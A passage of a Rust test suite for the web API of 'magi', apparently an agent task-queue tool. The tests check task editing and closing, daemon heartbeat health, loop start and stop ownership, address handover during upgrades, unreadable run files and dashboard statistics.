6952            "editing a task an agent filed must not turn it human: {body}"
6953        );
6954        assert_eq!(body["runs"], serde_json::json!(["20260101-000000-beef"]));
6955
6956        let reloaded = queue.get(&task.id).expect("reload");
6957        assert_eq!(reloaded.title, "new title");
6958        assert_eq!(reloaded.instruction, "new instruction");
6959    }
6960
6961    #[tokio::test]
6962    async fn editing_a_running_task_is_refused_with_a_reason_in_the_response() {
6963        let f = Fixture::start().await;
6964        let queue = f.queue();
6965        let mut task = Task::new(
6966            "in flight".to_owned(),
6967            "do not touch".to_owned(),
6968            PathBuf::from("/repo/magi"),
6969            Source::Human,
6970        );
6971        task.start("20260902-140502-bbbb".to_owned());
6972        queue.put(&mut task).expect("file the task");
6973
6974        let res = f
6975            .post(
6976                &format!("/api/queue/{}/edit", task.id),
6977                Some(r#"{"title":"x","instruction":"y"}"#),
6978            )
6979            .await;
6980        assert_eq!(res.status, 400, "{}", res.body);
6981        assert!(
6982            res.json()["error"]
6983                .as_str()
6984                .is_some_and(|e| e.contains("running")),
6985            "{}",
6986            res.body
6987        );
6988        assert_eq!(
6989            queue.get(&task.id).expect("reload").instruction,
6990            "do not touch",
6991            "the refused edit must not change the file"
6992        );
6993    }
6994
6995    #[tokio::test]
6996    async fn a_claimed_task_refuses_priority_and_edit_the_same_way_it_refuses_hold() {
6997        let f = Fixture::start().await;
6998        let queue = f.queue();
6999        let mut task = Task::new(
7000            "busy".to_owned(),
7001            "Running right now".to_owned(),
7002            PathBuf::from("/repo/magi"),
7003            Source::Human,
7004        );
7005        queue.put(&mut task).expect("file the task");
7006        let _claim = queue.claim(&task.id).expect("stand in for the daemon");
7007
7008        let priority = f
7009            .post(
7010                &format!("/api/queue/{}/priority", task.id),
7011                Some(r#"{"priority":9}"#),
7012            )
7013            .await;
7014        assert_eq!(priority.status, 409, "{}", priority.body);
7015
7016        let edit = f
7017            .post(
7018                &format!("/api/queue/{}/edit", task.id),
7019                Some(r#"{"title":"x","instruction":"y"}"#),
7020            )
7021            .await;
7022        assert_eq!(edit.status, 409, "{}", edit.body);
7023    }
7024
7025    #[tokio::test]
7026    async fn done_from_the_phone_keeps_runs_source_and_created_at_unlike_delete() {
7027        let f = Fixture::start().await;
7028        let queue = f.queue();
7029        let mut task = Task::new(
7030            "shipped by hand".to_owned(),
7031            "merged outside the loop".to_owned(),
7032            PathBuf::from("/repo/magi"),
7033            Source::Agent {
7034                run: "20260101-000000-b455".to_owned(),
7035                node: "implement".to_owned(),
7036            },
7037        );
7038        task.runs.push("20260101-000000-b455".to_owned());
7039        task.runs.push("20260101-000000-9af4".to_owned());
7040        queue.put(&mut task).expect("file the task");
7041        let created_at = task.created_at;
7042
7043        let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
7044        assert_eq!(done.status, 200, "{}", done.body);
7045        assert_eq!(done.json()["status_str"], "done");
7046
7047        let reloaded = queue.get(&task.id).expect("a done task is still on disk");
7048        assert_eq!(
7049            reloaded.runs,
7050            ["20260101-000000-b455", "20260101-000000-9af4"]
7051        );
7052        assert_eq!(
7053            reloaded.source,
7054            Source::Agent {
7055                run: "20260101-000000-b455".to_owned(),
7056                node: "implement".to_owned(),
7057            }
7058        );
7059        assert_eq!(reloaded.created_at, created_at);
7060    }
7061
7062    #[tokio::test]
7063    async fn closing_a_held_task_as_done_from_the_phone_clears_its_hold_reason() {
7064        // `done` is allowed on any status, including `held`, with no release
7065        // in between - so a task held for a reason and then closed directly
7066        // must not keep reading as "waiting on" it afterwards, on its card or
7067        // in `magi task show`.
7068        let f = Fixture::start().await;
7069        let queue = f.queue();
7070        let mut task = Task::new(
7071            "landed while held".to_owned(),
7072            "x".to_owned(),
7073            PathBuf::from("/repo/magi"),
7074            Source::Human,
7075        );
7076        task.hold_manual(Some("waiting on 3ed9".to_owned()));
7077        queue.put(&mut task).expect("file the held task");
7078
7079        let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
7080        assert_eq!(done.status, 200, "{}", done.body);
7081        assert_eq!(done.json()["status_str"], "done");
7082        assert!(
7083            done.json()["hold_reason"].is_null(),
7084            "a done task cannot still be waiting on something: {}",
7085            done.body
7086        );
7087    }
7088
7089    #[tokio::test]
7090    async fn done_from_the_phone_supersedes_an_earlier_blocked_attempt() {
7091        // `queue_done` is the phone's way to close a task the loop never
7092        // settled itself - after confirming a manual GitHub merge, say - and
7093        // that is just as much "this task's story is over" as the loop's own
7094        // `Merged`/`Ready` path, so it must trigger the same cleanup.
7095        let f = Fixture::start().await;
7096        let queue = f.queue();
7097        let runs = f.runs();
7098        write_run(&runs, "20260101-000000-doa1", RunStatus::Blocked);
7099        // The last attempt has to have actually landed for the earlier one
7100        // to count as superseded - see `done_from_the_phone_does_not_supersede_when_the_last_attempt_never_landed`
7101        // for the case where it didn't.
7102        write_run(&runs, "20260101-000000-doa2", RunStatus::Merged);
7103
7104        let mut task = Task::new(
7105            "landed by hand".to_owned(),
7106            "x".to_owned(),
7107            PathBuf::from("/repo/magi"),
7108            Source::Human,
7109        );
7110        task.runs.push("20260101-000000-doa1".to_owned());
7111        task.runs.push("20260101-000000-doa2".to_owned());
7112        queue.put(&mut task).expect("file the task");
7113
7114        let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
7115        assert_eq!(done.status, 200, "{}", done.body);
7116
7117        let reloaded_run = read_run(&runs, "20260101-000000-doa1")
7118            .expect("run still on disk under this fixture's own home");
7119        assert_eq!(
7120            reloaded_run.status,
7121            RunStatus::Superseded,
7122            "closing the task by hand must relabel the earlier blocked attempt exactly \
7123             like the loop's own settle path does"
7124        );
7125    }
7126
7127    #[tokio::test]
7128    async fn done_from_the_phone_does_not_supersede_when_the_last_attempt_never_landed() {
7129        // Closing a task by hand is allowed from any status, including one
7130        // whose last recorded attempt is itself still `Blocked`/`Failed` - a
7131        // manual merge the loop never watched, say. Nothing here is provably
7132        // why the task is done, so nothing earlier gets relabelled either.
7133        let f = Fixture::start().await;
7134        let queue = f.queue();
7135        let runs = f.runs();
7136        write_run(&runs, "20260101-000000-dob1", RunStatus::Blocked);
7137        write_run(&runs, "20260101-000000-dob2", RunStatus::Failed);
7138
7139        let mut task = Task::new(
7140            "closed with nothing actually landed".to_owned(),
7141            "x".to_owned(),
7142            PathBuf::from("/repo/magi"),
7143            Source::Human,
7144        );
7145        task.runs.push("20260101-000000-dob1".to_owned());
7146        task.runs.push("20260101-000000-dob2".to_owned());
7147        queue.put(&mut task).expect("file the task");
7148
7149        let done = f.post(&format!("/api/queue/{}/done", task.id), None).await;
7150        assert_eq!(done.status, 200, "{}", done.body);
7151
7152        let reloaded_run = read_run(&runs, "20260101-000000-dob1")
7153            .expect("run still on disk under this fixture's own home");
7154        assert_eq!(
7155            reloaded_run.status,
7156            RunStatus::Blocked,
7157            "the last recorded attempt never landed, so the earlier one must not be \
7158             relabelled as superseded by it"
7159        );
7160    }
7161
7162    #[tokio::test]
7163    async fn unknown_ids_are_json_not_found_on_both_stores() {
7164        let f = Fixture::start().await;
7165
7166        let run = f.get("/api/runs/nosuchrun").await;
7167        let task = f.post("/api/queue/nosuchtask/hold", None).await;
7168
7169        assert_eq!(run.status, 404);
7170        assert_eq!(task.status, 404);
7171        assert!(
7172            run.json()["error"]
7173                .as_str()
7174                .is_some_and(|e| e.contains("run")),
7175            "the error names what was not found: {}",
7176            run.body
7177        );
7178        assert!(
7179            task.json()["error"]
7180                .as_str()
7181                .is_some_and(|e| e.contains("task")),
7182            "the error names what was not found: {}",
7183            task.body
7184        );
7185    }
7186
7187    #[tokio::test]
7188    async fn the_daemon_counts_as_running_only_while_its_heartbeat_is_fresh() {
7189        let f = Fixture::start().await;
7190
7191        let missing = f.get("/api/health").await.json();
7192        assert_eq!(missing["daemon"]["running"], false, "no file, no daemon");
7193
7194        write_daemon(
7195            f.home.path(),
7196            Timestamp::now() - jiff::SignedDuration::from_secs(60),
7197        );
7198        let stale = f.get("/api/health").await.json();
7199        assert_eq!(
7200            stale["daemon"]["running"], false,
7201            "a minute without a heartbeat is a dead daemon, not a busy one"
7202        );
7203        assert!(
7204            stale["daemon"]["stale_for_secs"]
7205                .as_i64()
7206                .is_some_and(|s| s >= 55),
7207            "staleness is reported so the UI can say how long: {stale}"
7208        );
7209
7210        write_daemon(f.home.path(), Timestamp::now());
7211        let fresh = f.get("/api/health").await.json();
7212        assert_eq!(fresh["daemon"]["running"], true);
7213        assert_eq!(fresh["daemon"]["idle"], false);
7214        assert_eq!(fresh["daemon"]["pid"], 4242);
7215        assert_eq!(fresh["daemon"]["completed"], 7);
7216        assert_eq!(
7217            fresh["daemon"]["current"][0]["task"],
7218            "20260902-140501-aaaa"
7219        );
7220        assert_eq!(fresh["version"], env!("CARGO_PKG_VERSION"));
7221    }
7222
7223    #[tokio::test]
7224    async fn the_loop_is_not_running_until_something_starts_it() {
7225        let f = Fixture::start().await;
7226
7227        let view = f.get("/api/loop").await.json();
7228        assert_eq!(view["running"], false);
7229        assert_eq!(
7230            view["owned"], false,
7231            "nobody owns a loop that does not exist: {view}"
7232        );
7233        assert_eq!(view["stopping"], false);
7234        assert_eq!(view["last_error"], Value::Null);
7235        assert_eq!(view["daemon"]["running"], false);
7236        assert_eq!(
7237            view["repo"], "/repo/magi",
7238            "the repository a start would use, named before it is started"
7239        );
7240    }
7241
7242    #[tokio::test]
7243    async fn starting_the_loop_runs_it_in_this_process_and_health_says_the_same() {
7244        let f = Fixture::start().await;
7245
7246        let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7247        assert_eq!(res.status, 200, "{}", res.body);
7248        let view = res.json();
7249        assert_eq!(view["running"], true);
7250        assert_eq!(
7251            view["owned"], true,
7252            "the loop the UI started is the UI's own to stop: {view}"
7253        );
7254        assert_eq!(
7255            view["merge"],
7256            Value::Null,
7257            "no override was given, so each repository's own config decides"
7258        );
7259
7260        // The same object from the route a waking phone polls first. Two
7261        // surfaces disagreeing about whether anything is running is exactly
7262        // the confusion this UI exists to remove.
7263        let health = f.get("/api/health").await.json();
7264        assert_eq!(health["loop"]["running"], true, "{health}");
7265        assert_eq!(health["loop"]["owned"], true, "{health}");
7266
7267        f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7268    }
7269
7270    #[tokio::test]
7271    async fn a_second_start_is_refused_rather_than_racing_the_first_for_claims() {
7272        let f = Fixture::start().await;
7273        let first = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7274        assert_eq!(first.status, 200, "{}", first.body);
7275
7276        let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7277        assert_eq!(
7278            again.status, 409,
7279            "two loops on one queue race for the same claims: {}",
7280            again.body
7281        );
7282        assert!(
7283            again.json()["error"]
7284                .as_str()
7285                .is_some_and(|e| e.contains("already running the loop")),
7286            "the refusal has to say why: {}",
7287            again.body
7288        );
7289        assert_eq!(
7290            f.get("/api/loop").await.json()["running"],
7291            true,
7292            "and the loop that was already running is untouched by it"
7293        );
7294
7295        f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7296    }
7297
7298    #[tokio::test]
7299    async fn stopping_answers_at_once_and_the_loop_settles_stopped() {
7300        let f = Fixture::start().await;
7301        f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7302
7303        let res = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7304        assert_eq!(
7305            res.status, 200,
7306            "the answer must not wait for the loop: a run in flight is tens of \
7307             minutes and the operator is holding a phone: {}",
7308            res.body
7309        );
7310
7311        let view = settled(&f, |v| v["running"] == false).await;
7312        assert_eq!(view["owned"], false);
7313        assert_eq!(
7314            view["stopping"], false,
7315            "a loop that has stopped is not still stopping: {view}"
7316        );
7317        assert_eq!(
7318            view["last_error"],
7319            Value::Null,
7320            "a loop that was asked to stop did not fail: {view}"
7321        );
7322
7323        // Idempotent, because the operator cannot tell a slow stop from a lost
7324        // one and will press it again.
7325        let twice = f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7326        assert_eq!(twice.status, 200, "{}", twice.body);
7327    }
7328
7329    #[tokio::test]
7330    async fn a_loop_another_process_owns_can_be_neither_started_nor_stopped_here() {
7331        let f = Fixture::start().await;
7332        // How the operator has been doing it: a `magi serve` of their own,
7333        // heartbeat fresh, in the same home this UI reads.
7334        write_daemon(f.home.path(), Timestamp::now());
7335
7336        let view = f.get("/api/loop").await.json();
7337        assert_eq!(view["running"], false, "not in this process: {view}");
7338        assert_eq!(view["owned"], false, "and not this process's to control");
7339        assert_eq!(
7340            view["daemon"]["running"], true,
7341            "but a loop is alive somewhere, which is what the UI must say"
7342        );
7343        assert_eq!(view["daemon"]["pid"], 4242);
7344
7345        for body in [r#"{"running":true}"#, r#"{"running":false}"#] {
7346            let res = f.post("/api/loop", Some(body)).await;
7347            assert_eq!(
7348                res.status, 409,
7349                "neither button may pretend to work on someone else's loop: {}",
7350                res.body
7351            );
7352            assert!(
7353                res.json()["error"]
7354                    .as_str()
7355                    .is_some_and(|e| e.contains("4242")),
7356                "the refusal has to name the process the operator must go to: {}",
7357                res.body
7358            );
7359        }
7360        assert_eq!(
7361            f.get("/api/loop").await.json()["running"],
7362            false,
7363            "and the refusal started nothing"
7364        );
7365    }
7366
7367    #[tokio::test]
7368    async fn a_stale_status_file_is_not_a_foreign_owner() {
7369        let f = Fixture::start().await;
7370        write_daemon(
7371            f.home.path(),
7372            Timestamp::now() - jiff::SignedDuration::from_secs(60),
7373        );
7374
7375        let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7376        assert_eq!(
7377            res.status, 200,
7378            "a daemon killed a minute ago must not lock the loop out of its \
7379             own home for good: {}",
7380            res.body
7381        );
7382        assert_eq!(res.json()["running"], true);
7383
7384        f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7385    }
7386
7387    #[tokio::test]
7388    async fn loop_rev_moves_on_a_start_so_a_phone_learns_without_polling() {
7389        let f = Fixture::start().await;
7390        let before = f.get("/api/health").await.json()["loop_rev"]
7391            .as_u64()
7392            .expect("a loop revision");
7393
7394        f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7395
7396        let after = f.get("/api/health").await.json()["loop_rev"]
7397            .as_u64()
7398            .expect("a loop revision");
7399        assert!(
7400            after > before,
7401            "the loop is in-process state, so this counter is the only thing \
7402             that tells a second device the first one started it: {before} -> \
7403             {after}"
7404        );
7405
7406        f.post("/api/loop", Some(r#"{"running":false}"#)).await;
7407    }
7408
7409    #[tokio::test]
7410    async fn a_loop_that_failed_says_why_and_does_not_read_as_running() {
7411        let f = Fixture::with_loop(launch_broken).await;
7412
7413        let res = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7414        assert_eq!(
7415            res.status, 200,
7416            "starting it is not the failure: {}",
7417            res.body
7418        );
7419
7420        let view = settled(&f, |v| v["last_error"].is_string()).await;
7421        assert_eq!(
7422            view["running"], false,
7423            "a loop that died must not read as running, or the operator has \
7424             nothing to press: {view}"
7425        );
7426        assert_eq!(view["owned"], false);
7427        assert!(
7428            view["last_error"]
7429                .as_str()
7430                .is_some_and(|e| e.contains("read-only file system")),
7431            "the phone is where a loop that died at 3am is visible: {view}"
7432        );
7433
7434        // And it can be started again: the corpse was reaped, not left to
7435        // occupy the slot.
7436        let again = f.post("/api/loop", Some(r#"{"running":true}"#)).await;
7437        assert_eq!(again.status, 200, "{}", again.body);
7438        assert_eq!(
7439            again.json()["last_error"],
7440            Value::Null,
7441            "a fresh start does not keep showing why the last one died"
7442        );
7443    }
7444
7445    /// An upgrade parks the run in flight before it restarts, and a park waits
7446    /// for the node - up to `timeout_implement`, an hour by default. The deck
7447    /// has to answer for all of it: the operator has just been told a run is
7448    /// finishing first, and this address is the only place that says how it is
7449    /// going. It did not, once - the listener went with the `select!` arm that
7450    /// began the handover, and the phone got `Cannot reach magi: Failed to
7451    /// fetch` for the rest of the wave.
7452    ///
7453    /// The other half is the older rule: the address must be free *before* the
7454    /// successor is started, or it dies on "address already in use" with its
7455    /// stdio sent to null and the deck never comes back.
7456    #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
7457    async fn the_deck_answers_while_it_parks_and_frees_the_address_first() {
7458        let home = TempDir::new().expect("temp home");
7459        let runs = home.path().join("runs");
7460        std::fs::create_dir_all(&runs).expect("runs dir");
7461        let ui = Ui::new(
7462            Queue::at(home.path().join("queue")),
7463            Questions::at(home.path().join("questions")),
7464            Talks::at(home.path().join("talks")),
7465            runs,
7466            home.path().to_path_buf(),
7467            PathBuf::from("/repo/magi"),
7468        )
7469        .with_worktrees_root(home.path().join("wt"))
7470        .with_launch(launch_knocking_on_the_way_out);
7471        let looping = ui.looping();
7472        let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
7473            .await
7474            .expect("bind loopback");
7475        let addr = listener.local_addr().expect("local addr");
7476        *PARK_KNOCK.lock().expect("park knock") = Some(addr);
7477        let served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
7478
7479        let started = request(addr, "POST", "/api/loop", Some(r#"{"running":true}"#)).await;
7480        assert_eq!(started.status, 200, "the loop starts: {}", started.body);
7481
7482        // The successor's whole job, and the one thing it cannot do while this
7483        // process still holds the socket.
7484        //
7485        // One bind is not enough, and the reason is not this process's order of
7486        // operations: aborting the accept loop drops the listener, but axum
7487        // serves each accepted connection on a task of its own, and those are
7488        // not aborted. The requests above left sockets on this very address,
7489        // and under BSD's bind rules (macOS) a live socket on 127.0.0.1:port
7490        // makes a fresh bind fail with EADDRINUSE until its task is dropped.
7491        // Production absorbs that in `bind_waiting`; so does this. Only
7492        // `AddrInUse` is retried, and the listener is released before the
7493        // closure returns - were the order wrong, the listener would outlive
7494        // the closure and every attempt would fail. Inferred from the bind
7495        // rules and the code; not reproduced on macOS.
7496        let bound = std::sync::Mutex::new(None);
7497        hand_over(home.path(), &looping, served, || {
7498            let deadline = std::time::Instant::now() + std::time::Duration::from_secs(5);
7499            let attempt = loop {
7500                match std::net::TcpListener::bind(addr) {
7501                    Ok(l) => {
7502                        drop(l);
7503                        break Ok(());
7504                    }
7505                    Err(e)
7506                        if e.kind() == std::io::ErrorKind::AddrInUse
7507                            && std::time::Instant::now() < deadline =>
7508                    {
7509                        std::thread::sleep(std::time::Duration::from_millis(10));
7510                    }
7511                    Err(e) => break Err(e.to_string()),
7512                }
7513            };
7514            *bound.lock().expect("bound") = Some(attempt);
7515            Ok(())
7516        })
7517        .await
7518        .expect("hand over");
7519
7520        assert_eq!(
7521            *PARK_HEARD.lock().expect("park heard"),
7522            Some(200),
7523            "the deck must answer while the loop is parking"
7524        );
7525        let attempt = bound
7526            .lock()
7527            .expect("bound")
7528            .take()
7529            .expect("the successor was started");
7530        assert!(
7531            attempt.is_ok(),
7532            "and the address must be free by the time it is: {attempt:?}"
7533        );
7534    }
7535
7536    #[tokio::test]
7537    async fn a_newer_daemon_status_file_still_renders() {
7538        let f = Fixture::start().await;
7539        // A field this build has never heard of must not turn the status line
7540        // into a 500; that is the whole reason the reader is permissive.
7541        std::fs::write(
7542            f.home.path().join("daemon.json"),
7543            serde_json::json!({
7544                "schema": 2,
7545                "updated_at": Timestamp::now().to_string(),
7546                "idle": true,
7547                "surprise": { "nested": [1, 2, 3] },
7548            })
7549            .to_string(),
7550        )
7551        .expect("write daemon.json");
7552
7553        let health = f.get("/api/health").await;
7554
7555        assert_eq!(health.status, 200);
7556        assert_eq!(health.json()["daemon"]["running"], true);
7557    }
7558
7559    #[tokio::test]
7560    async fn a_corrupt_run_is_skipped_in_the_list_and_explained_on_its_own_route() {
7561        let f = Fixture::start().await;
7562        write_run(&f.runs(), "20260902-140501-good", RunStatus::Ready);
7563        let broken = f.runs().join("20260902-140502-bad");
7564        std::fs::create_dir_all(&broken).expect("run dir");
7565        std::fs::write(broken.join("run.json"), "{ truncated").expect("write run.json");
7566
7567        let list = f.get("/api/runs").await;
7568        let detail = f.get("/api/runs/20260902-140502-bad").await;
7569
7570        assert_eq!(list.status, 200);
7571        let listed = list.json();
7572        let ids: Vec<&str> = listed
7573            .as_array()
7574            .expect("an array")
7575            .iter()
7576            .map(|r| r["id"].as_str().expect("an id"))
7577            .collect();
7578        assert_eq!(
7579            ids,
7580            vec!["20260902-140501-good"],
7581            "one unreadable run must not cost the operator the whole history"
7582        );
7583        assert_eq!(detail.status, 500);
7584        assert!(
7585            detail.json()["error"]
7586                .as_str()
7587                .is_some_and(|e| e.contains("run.json")),
7588            "the failure names the file to look at: {}",
7589            detail.body
7590        );
7591        // A skipped run has to be countable somewhere, or the UI shows an
7592        // empty history with nothing to explain it - which is exactly what a
7593        // directory full of older-schema runs looks like.
7594        let health = f.get("/api/health").await;
7595        assert_eq!(health.json()["runs_unreadable"], 1);
7596    }
7597
7598    /// The dashboard reads every run's state itself rather than trusting a
7599    /// separately-maintained count, so an unreadable run must be counted the
7600    /// same way `/api/health` counts it - never silently dropped the way the
7601    /// CLI's own `stats::load_all` drops it.
7602    #[tokio::test]
7603    async fn stats_runs_unreadable_matches_health() {
7604        let f = Fixture::start().await;
7605        write_run(&f.runs(), "20260902-140501-good", RunStatus::Ready);
7606        let broken = f.runs().join("20260902-140502-bad");
7607        std::fs::create_dir_all(&broken).expect("run dir");
7608        std::fs::write(broken.join("run.json"), "{ truncated").expect("write run.json");
7609
7610        let stats = f.get("/api/stats").await;
7611        let health = f.get("/api/health").await;
7612
7613        assert_eq!(stats.status, 200);
7614        assert_eq!(stats.json()["totals"]["runs"], 1);
7615        assert_eq!(stats.json()["runs_unreadable"], 1);
7616        assert_eq!(
7617            stats.json()["runs_unreadable"],
7618            health.json()["runs_unreadable"],
7619            "the dashboard and /api/health must never disagree about how many \
7620             runs could not be read"
7621        );
7622    }
7623
7624    #[tokio::test]
7625    async fn stats_verdict_breakdown_covers_stalled_and_in_progress_runs() {
7626        let f = Fixture::start().await;
7627        write_run(&f.runs(), "20260902-140501-a", RunStatus::Merged);
7628        write_run(&f.runs(), "20260902-140502-b", RunStatus::Stalled);
7629        write_run(&f.runs(), "20260902-140503-c", RunStatus::Implementing);
7630
7631        let totals = &f.get("/api/stats").await.json()["totals"];
7632        assert_eq!(totals["runs"], 3);
7633        assert_eq!(totals["merged"], 1);
7634        assert_eq!(totals["stalled"], 1);
7635        assert_eq!(totals["in_progress"], 1);
7636        // A stalled run must never read as blocked/merged/ready - it is its
7637        // own bucket, not folded into a "decided" one.
7638        assert_eq!(totals["blocked"], 0);
7639        assert_eq!(totals["ready"], 0);
7640    }
7641
7642    #[tokio::test]
7643    async fn stats_advisors_report_proposals_and_reflection() {
7644        use crate::advise::{Advice, AdvisorRecord, Reflection};
7645        use crate::verdict::Proposal;
7646
7647        let f = Fixture::start().await;
7648        let mut state = RunState::new(
7649            PathBuf::from("/repo/magi"),
7650            "main".to_owned(),
7651            "0123456789abcdef".to_owned(),
7652            "task".to_owned(),
7653            Config::default(),
7654        );
7655        state.id = "20260902-140501-a".to_owned();
7656        state.status = RunStatus::Merged;
7657        state.advice = Some(Advice {
7658            records: vec![
7659                AdvisorRecord {
7660                    seat: "advisor-1".to_owned(),
7661                    agent: "alpha".to_owned(),
7662                    proposal: Some(Proposal {
7663                        approach: "do it".to_owned(),
7664                        key_tradeoff: "speed over memory".to_owned(),
7665                        risks: Vec::new(),
7666                        touches: Vec::new(),
7667                        why_not_naive: "breaks under load".to_owned(),
7668                    }),
7669                    error: None,
7670                    duration_ms: 0,
7671                    reflection: Reflection::Strong,
7672                },
7673                AdvisorRecord {
7674                    seat: "advisor-2".to_owned(),
7675                    agent: "alpha".to_owned(),
7676                    proposal: None,
7677                    error: Some("timed out".to_owned()),
7678                    duration_ms: 0,
7679                    reflection: Reflection::Absent,
7680                },
7681            ],
7682            synthesis: Some("blended brief".to_owned()),
7683        });
7684        let dir = f.runs().join(&state.id);
7685        std::fs::create_dir_all(&dir).expect("run dir");
7686        std::fs::write(
7687            dir.join("run.json"),
7688            serde_json::to_string_pretty(&state).expect("serialize run"),
7689        )
7690        .expect("write run.json");
7691
7692        let advisors = f.get("/api/stats").await.json()["advisors"].clone();
7693        let alpha = advisors
7694            .as_array()
7695            .expect("an array")
7696            .iter()
7697            .find(|a| a["agent"] == "alpha")
7698            .expect("alpha row");
7699        assert_eq!(alpha["seated"], 2);
7700        assert_eq!(alpha["proposed"], 1);
7701        assert_eq!(alpha["absent"], 1);
7702        assert_eq!(alpha["strong"], 1);
7703        assert_eq!(alpha["faint"], 0);
7704        assert_eq!(alpha["reflection_rate"]["pct"], 100.0);
7705    }
7706
7707    #[tokio::test]
7708    async fn stats_release_bumps_split_clean_from_attention() {
7709        use crate::run::ReleaseBump;
7710
7711        let f = Fixture::start().await;
7712
7713        let mut clean = RunState::new(
7714            PathBuf::from("/repo/magi"),
7715            "main".to_owned(),
7716            "0123456789abcdef".to_owned(),
7717            "task".to_owned(),
7718            Config::default(),
7719        );
7720        clean.id = "20260902-140501-a".to_owned();
7721        clean.status = RunStatus::Merged;
7722        clean.release_bump = Some(ReleaseBump {
7723            pr_url: Some("https://github.com/o/r/pull/1".to_owned()),
7724            version: Some("1.0.0".to_owned()),
7725            automerge_enabled: true,
7726            merged_directly: false,
7727            problem: None,
7728            action_required: None,
7729        });
7730
7731        let mut blocked = RunState::new(
7732            PathBuf::from("/repo/magi"),
7733            "main".to_owned(),
7734            "0123456789abcdef".to_owned(),
7735            "task".to_owned(),
7736            Config::default(),
7737        );
7738        blocked.id = "20260902-140502-b".to_owned();
7739        blocked.status = RunStatus::Merged;
7740        blocked.release_bump = Some(ReleaseBump {
7741            pr_url: Some("https://github.com/o/r/pull/2".to_owned()),
7742            version: Some("1.0.1".to_owned()),
7743            automerge_enabled: false,
7744            merged_directly: false,
7745            problem: Some("checks red".to_owned()),
7746            action_required: Some("look at the PR".to_owned()),
7747        });
7748
7749        for state in [&clean, &blocked] {
7750            let dir = f.runs().join(&state.id);
7751            std::fs::create_dir_all(&dir).expect("run dir");
7752            std::fs::write(
7753                dir.join("run.json"),
7754                serde_json::to_string_pretty(state).expect("serialize run"),
7755            )
7756            .expect("write run.json");
7757        }
7758
7759        let bumps = f.get("/api/stats").await.json()["release_bumps"].clone();
7760        assert_eq!(bumps["merged"], 2);
7761        assert_eq!(bumps["recorded"], 2);
7762        assert_eq!(bumps["pr_opened"], 2);
7763        assert_eq!(bumps["automerge_enabled"], 1);
7764        assert_eq!(bumps["needs_attention"], 1);
7765        assert_eq!(bumps["clean"], 1);
7766        assert_eq!(bumps["coverage_rate"]["pct"], 100.0);
7767        assert_eq!(bumps["attention_rate"]["pct"], 50.0);
7768    }
7769
7770    #[tokio::test]
7771    async fn stats_release_bumps_rates_are_null_with_nothing_recorded() {
7772        let f = Fixture::start().await;
7773        write_run(&f.runs(), "20260902-140501-a", RunStatus::Merged);
7774
7775        let bumps = f.get("/api/stats").await.json()["release_bumps"].clone();
7776        assert_eq!(bumps["merged"], 1);
7777        assert_eq!(bumps["recorded"], 0);
7778        // `merged` is nonzero, so coverage still reads as a real 0%, not an
7779        // absent rate - "0 of 1 merged runs" is a fact, not a missing value.
7780        assert_eq!(bumps["coverage_rate"]["pct"], 0.0);
7781        // `pr_opened` and `recorded` are both zero here, so these rates have
7782        // no denominator to compute from and must be null.
7783        assert_eq!(bumps["automerge_rate"], Value::Null);
7784        assert_eq!(bumps["attention_rate"], Value::Null);
7785    }
7786
7787    #[tokio::test]
7788    async fn stats_queue_counts_come_from_the_live_queue() {
7789        let f = Fixture::start().await;
7790        let q = f.queue();
7791        let mut queued = Task::new(
7792            "queued task".to_owned(),
7793            "do it".to_owned(),
7794            PathBuf::from("/repo"),
7795            Source::Human,
7796        );
7797        q.put(&mut queued).expect("put queued");
7798        let mut held = Task::new(
7799            "held task".to_owned(),
7800            "do it later".to_owned(),
7801            PathBuf::from("/repo"),
7802            Source::Human,
7803        );
7804        held.hold_machine(Some("out of attempts".to_owned()));
7805        q.put(&mut held).expect("put held");
7806
7807        let queue = f.get("/api/stats").await.json()["queue"].clone();
7808        assert_eq!(queue["queued"], 1);
7809        assert_eq!(queue["held"], 1);
7810        assert_eq!(queue["running"], 0);
7811        assert_eq!(queue["done"], 0);
7812        assert_eq!(queue["failed"], 0);
7813        assert_eq!(queue["blocked"], 0);
7814    }
7815
7816    #[tokio::test]
7817    async fn stats_on_an_empty_home_is_all_zero_not_an_error() {
7818        let f = Fixture::start().await;
7819        let stats = f.get("/api/stats").await;
7820        assert_eq!(stats.status, 200);
7821        assert_eq!(stats.json()["totals"]["runs"], 0);
7822        assert_eq!(stats.json()["totals"]["completion_rate"], Value::Null);
7823        assert_eq!(stats.json()["runs_unreadable"], 0);
7824        assert!(stats.json()["agents"].as_array().unwrap().is_empty());
7825        assert!(stats.json()["advisors"].as_array().unwrap().is_empty());
7826    }
7827
7828    #[tokio::test]
7829    async fn a_run_is_summarised_for_the_list_and_served_whole_on_its_own_route() {
7830        let f = Fixture::start().await;
7831        write_run(&f.runs(), "20260902-140501-a1b2", RunStatus::Ready);
7832
7833        let summary = f.get("/api/runs").await.json();
7834        let row = &summary[0];
7835        assert_eq!(row["short"], "a1b2");
7836        assert_eq!(row["status"], "ready");
7837        assert_eq!(row["done"], true);
7838        assert_eq!(row["title"], "Add a web UI");
7839        assert_eq!(row["repo_name"], "magi");
7840        assert_eq!(row["judges"], 3);
7841        assert_eq!(row["winner"], Value::Null);
7842        assert_eq!(row["reviews"], 0);
7843
7844        // The short id resolves, and the detail route is the state itself, not
7845        // a projection of it: the UI reads fields the summary does not carry.
7846        let detail = f.get("/api/runs/a1b2").await;
7847        assert_eq!(detail.status, 200);
7848        assert_eq!(detail.json()["base_branch"], "main");
7849        assert_eq!(detail.json()["id"], "20260902-140501-a1b2");
7850    }
7851
7852    /// `status: "ready"` alone cannot tell a run still headed for a landing
